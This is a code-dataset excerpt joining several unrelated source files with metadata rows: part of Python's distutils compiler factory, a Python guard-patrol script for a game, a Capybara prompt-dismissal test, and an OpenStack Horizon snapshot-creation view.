from distutils.fancy_getopt import FancyGetopt
compilers = []
for compiler in compiler_class.keys():
compilers.append(("compiler="+compiler, None,
compiler_class[compiler][2]))
compilers.sort()
pretty_printer = FancyGetopt(compilers)
pretty_printer.print_help("List of available compilers:")
def new_compiler (plat=None,
compiler=None,
verbose=0,
dry_run=0,
force=0):
"""Generate an instance of some CCompiler subclass for the supplied
platform/compiler combination. 'plat' defaults to 'os.name'
(eg. 'posix', 'nt'), and 'compiler' defaults to the default compiler
for that platform. Currently only 'posix' and 'nt' are supported, and
the default compilers are "traditional Unix interface" (UnixCCompiler
class) and Visual C++ (MSVCCompiler class). Note that it's perfectly
possible to ask for a Unix compiler object under Windows, and a
Microsoft compiler object under Unix -- if you supply a value for
'compiler', 'plat' is ignored.
"""
if plat is None:
plat = os.name
try:
if compiler is None:
compiler = get_default_compiler(plat)
(module_name, class_name, long_description) = compiler_class[compiler]
except KeyError:
msg = "don't know how to compile C/C++ code on platform '%s'" % plat
if compiler is not None:
msg = msg + " with '%s' compiler" % compiler
raise DistutilsPlatformError, msg
try:
module_name = "distutils." + module_name
__import__ (module_name)
module = sys.modules[module_name]
klass = vars(module)[class_name]
except ImportError:
raise DistutilsModuleError, \
"can't compile C/C++ code: unable to load module '%s'" % \
module_name
except KeyError:
raise DistutilsModuleError, \
("can't compile C/C++ code: unable to find class '%s' " +
"in module '%s'") % (class_name, module_name)
# XXX The None is necessary to preserve backwards compatibility
# with classes that expect verbose to be the first positional
# argument.
return klass (None, dry_run, force)
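# Illustrative sketch (editor's note): a typical build driven through this
# factory, using only methods defined in this module.  The file, macro and
# library names are hypothetical.
#
#     cc = new_compiler()     # default compiler for the current platform
#     objs = cc.compile(['foo.c'], output_dir='build',
#                       macros=[('NDEBUG', None)])
#     cc.link_shared_object(objs, 'foo.so', output_dir='build')
#     cc.link_executable(objs, 'foo', output_dir='build', libraries=['m'])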
def gen_preprocess_options (macros, include_dirs):
"""Generate C pre-processor options (-D, -U, -I) as used by at least
two types of compilers: the typical Unix compiler and Visual C++.
'macros' is the usual thing, a list of 1- or 2-tuples, where (name,)
means undefine (-U) macro 'name', and (name,value) means define (-D)
macro 'name' to 'value'. 'include_dirs' is just a list of directory
names to be added to the header file search path (-I). Returns a list
of command-line options suitable for either Unix compilers or Visual
C++.
"""
# XXX it would be nice (mainly aesthetic, and so we don't generate
# stupid-looking command lines) to go over 'macros' and eliminate
# redundant definitions/undefinitions (ie. ensure that only the
# latest mention of a particular macro winds up on the command
# line). I don't think it's essential, though, since most (all?)
# Unix C compilers only pay attention to the latest -D or -U
# mention of a macro on their command line. Similar situation for
# 'include_dirs'. I'm punting on both for now. Anyways, weeding out
# redundancies like this should probably be the province of
# CCompiler, since the data structures used are inherited from it
# and therefore common to all CCompiler classes.
pp_opts = []
for macro in macros:
if not (type (macro) is TupleType and
1 <= len (macro) <= 2):
raise TypeError, \
("bad macro definition '%s': " +
"each element of 'macros' list must be a 1- or 2-tuple") % \
macro
if len (macro) == 1: # undefine this macro
pp_opts.append ("-U%s" % macro[0])
elif len (macro) == 2:
if macro[1] is None: # define with no explicit value
pp_opts.append ("-D%s" % macro[0])
else:
# XXX *don't* need to be clever about quoting the
# macro value here, because we're going to avoid the
# shell at all costs when we spawn the command!
pp_opts.append ("-D%s=%s" % macro)
for dir in include_dirs:
pp_opts.append ("-I%s" % dir)
return pp_opts
# gen_preprocess_options ()
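# Worked example (editor's note):
#
#     gen_preprocess_options([('VERSION', '"1.0"'), ('NDEBUG', None), ('DEBUG',)],
#                            ['include', '/usr/local/include'])
#         -> ['-DVERSION="1.0"', '-DNDEBUG', '-UDEBUG',
#             '-Iinclude', '-I/usr/local/include']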
def gen_lib_options (compiler, library_dirs, runtime_library_dirs, libraries):
"""Generate linker options for searching library directories and
linking with specific libraries. 'libraries' and 'library_dirs' are,
respectively, lists of library names (not filenames!) and search
directories. Returns a list of command-line options suitable for use
with some compiler (depending on the two format strings passed in).
"""
lib_opts = []
for dir in library_dirs:
lib_opts.append (compiler.library_dir_option (dir))
for dir in runtime_library_dirs:
opt = compiler.runtime_library_dir_option (dir)
if type(opt) is ListType:
lib_opts = lib_opts + opt
else:
lib_opts.append (opt)
# XXX it's important that we *not* remove redundant library mentions!
# sometimes you really do have to say "-lfoo -lbar -lfoo" in order to
# resolve all symbols. I just hope we never have to say "-lfoo obj.o
# -lbar" to get things to work -- that's certainly a possibility, but a
# pretty nasty way to arrange your C code.
for lib in libraries:
(lib_dir, lib_name) = os.path.split (lib)
if lib_dir:
lib_file = compiler.find_library_file ([lib_dir], lib_name)
if lib_file:
lib_opts.append (lib_file)
else:
compiler.warn ("no library file corresponding to "
"'%s' found (skipping)" % lib)
else:
lib_opts.append (compiler.library_option (lib))
return lib_opts
# gen_lib_options ()
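# Illustrative sketch (editor's note): the exact strings depend on the
# concrete compiler's library_dir_option()/library_option() implementations.
# Assuming Unix-style '-L'/'-l' options, something like:
#
#     gen_lib_options(cc, ['/opt/lib'], [], ['foo'])
#         -> ['-L/opt/lib', '-lfoo']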
| gpl-2.0 | -3,102,594,236,466,928,000 | 39.947148 | 86 | 0.594317 | false |
nickthecoder/itchy | resources/Cover-of-Darkness/scripts/guard.py | 1 | 5272 | from common import *
properties = ArrayList()
properties.add( DoubleProperty( "forwardSpeed" ) )
properties.add( DoubleProperty( "turnSpeed" ) )
properties.add( StringProperty( "routeString" ) )
properties.add( BooleanProperty( "debug" ) )
# routeString is a set of parts separated by spaces.
# A part is either a number, or a command letter followed by a number.
# The command letters are as follows:
# L - Turn left n degrees.
# R - Turn right n degrees.
# <no command> - Move forwards n pixels
# C - Move in an arc n pixels, where the amount of turn is given in the NEXT part,
# which should be either an L or a R command.
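# An illustrative route (editor's note, not taken from any original scene):
#   "100 L90 C50 R180 100"
# moves forward 100 pixels, turns left 90 degrees, then arcs forward 50
# pixels while turning right 180 degrees, and finally moves forward another
# 100 pixels.  nextPart() below also accepts "Sn" (pause for n seconds,
# assuming 60 ticks per second) and "Tn" (pause for n ticks), which are not
# listed above.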
class Guard(AbstractRole) :
def __init__(self) :
self.routeString = "L360 R360"
self.forwardSpeed = 1
self.turnSpeed = 1
self.steps = 0
self.stepsTaken = 0
self.routeIndex = 0
self.turnAmount = 1
self.forwardAmount = 0
self.debug = False
def onBirth(self) :
self.torch = self.actor.createCompanion("torch").role
self.torch.actor.direction = self.actor.direction
self.torch.owner = self
if self.debug :
print "Starting at :", self.actor.x, self.actor.y, "direction", self.actor.direction
self.startX = self.actor.x
self.startY = self.actor.y
self.startDirection = self.actor.direction
self.addTag("guard")
def tick(self) :
if self.stepsTaken >= self.steps :
self.nextPart()
# The "C" command needs a bodge to keep it symetric. So we make a half step forward at the beginnging
# and a half step at the end without a turn.
if self.turnAmount != 0 and self.forwardAmount != 0 :
self.steps += 1
self.stepsTaken += 1
if self.turnAmount != 0 and self.forwardAmount != 0 and self.stepsTaken == 1 :
# Do the half step at the beginning.
self.actor.moveForwards( self.forwardAmount / 2)
elif self.turnAmount != 0 and self.forwardAmount != 0 and self.stepsTaken == self.steps :
# Half step at the end WITHOUT a turn after it.
self.actor.moveForwards( self.forwardAmount / 2)
return
else :
# Normal step
if self.forwardAmount != 0 :
self.actor.moveForwards( self.forwardAmount )
# Turn
if self.turnAmount != 0 :
self.actor.direction += self.turnAmount
self.torch.actor.direction += self.turnAmount
if self.collided( "door" ) :
game.director.restartScene()
def nextPart(self) :
self.stepsTaken = 0
parts = self.routeString.split();
if self.routeIndex >= len( parts ) :
self.routeIndex = 0
if self.debug :
print "Ending at :", self.actor.x, self.actor.y, "direction", self.actor.direction
self.actor.x = self.startX
self.actor.y = self.startY
self.actor.direction = self.startDirection
self.torch.actor.direction = self.startDirection
part = parts[ self.routeIndex ]
self.routeIndex += 1
#try :
command = part[0:1].upper()
value = float( part[1:] ) if command.isalpha() else float( part )
if command == "L" or command == "R" :
# Calculate the number of steps needed, and how far round each step has to be.
# turnAmount will be close to, but not always exactly the same as self.turnSpeed.
self.steps = int( value / self.turnSpeed )
self.turnAmount = value / self.steps
self.forwardAmount = 0
if command == "R":
self.turnAmount = - self.turnAmount
elif command == "S" :
self.steps = int(value * 60)
self.forwardAmount = 0
self.turnAmount = 0
elif command == "T" :
self.steps = int(value)
self.forwardAmount = 0
self.turnAmount = 0
else :
# Calculate the number of steps needed, and then how far each step has to be.
# forwardAmount will be close to, but not always exactly the same as self.forwardSpeed.
self.steps = int( value / self.forwardSpeed )
self.forwardAmount = value / self.steps
self.turnAmount = 0
# Command C is a CURVE - use the next part to work out the angle to turn and this part for the length,
# and do them simultaneously.
if len(parts) > 1 and command == "C" :
tmpSteps = self.steps
self.nextPart()
self.turnAmount = self.turnAmount * self.steps / tmpSteps
self.steps = tmpSteps
self.forwardAmount = value / self.steps
#except :
# print "Guard skipping", part
# Boiler plate code - no need to change this
def getProperties(self):
return properties
# Boiler plate code - no need to change this
def getClassName(self):
return ClassName( Role, self.__module__ + ".py" )
| gpl-3.0 | -537,064,699,696,413,000 | 34.38255 | 114 | 0.569803 | false |
elliterate/capybara.py | capybara/tests/session/test_dismiss_prompt.py | 1 | 1103 | import pytest
from capybara.exceptions import ModalNotFound
@pytest.mark.requires("modals")
class TestDismissPrompt:
@pytest.fixture(autouse=True)
def setup_session(self, session):
session.visit("/with_js")
def test_dismisses_the_prompt(self, session):
with session.dismiss_prompt():
session.click_link("Open prompt")
assert session.has_xpath("//a[@id='open-prompt' and @response='dismissed']")
def test_raises_an_error_if_no_prompt_found(self, session):
with pytest.raises(ModalNotFound):
with session.dismiss_prompt():
pass
def test_dismisses_the_prompt_if_the_message_matches(self, session):
with session.dismiss_prompt("Prompt opened"):
session.click_link("Open prompt")
assert session.has_xpath("//a[@id='open-prompt' and @response='dismissed']")
def test_raises_error_if_the_message_does_not_match(self, session):
with pytest.raises(ModalNotFound):
with session.dismiss_prompt("Incorrect Text"):
session.click_link("Open prompt")
| mit | -5,652,679,203,035,957,000 | 35.766667 | 84 | 0.658205 | false |
fajoy/horizon-example | openstack_dashboard/dashboards/project/images_and_snapshots/snapshots/views.py | 1 | 2200 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing instance snapshots.
"""
import logging
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from openstack_dashboard import api
from .forms import CreateSnapshot
LOG = logging.getLogger(__name__)
class CreateView(forms.ModalFormView):
form_class = CreateSnapshot
template_name = 'project/images_and_snapshots/snapshots/create.html'
success_url = reverse_lazy("horizon:project:images_and_snapshots:index")
def get_object(self):
if not hasattr(self, "_object"):
try:
self._object = api.nova.server_get(self.request,
self.kwargs["instance_id"])
except:
redirect = reverse('horizon:project:instances:index')
exceptions.handle(self.request,
_("Unable to retrieve instance."),
redirect=redirect)
return self._object
def get_initial(self):
return {"instance_id": self.kwargs["instance_id"]}
def get_context_data(self, **kwargs):
context = super(CreateView, self).get_context_data(**kwargs)
context['instance'] = self.get_object()
return context
| apache-2.0 | 3,185,531,436,873,776,600 | 32.846154 | 78 | 0.67 | false |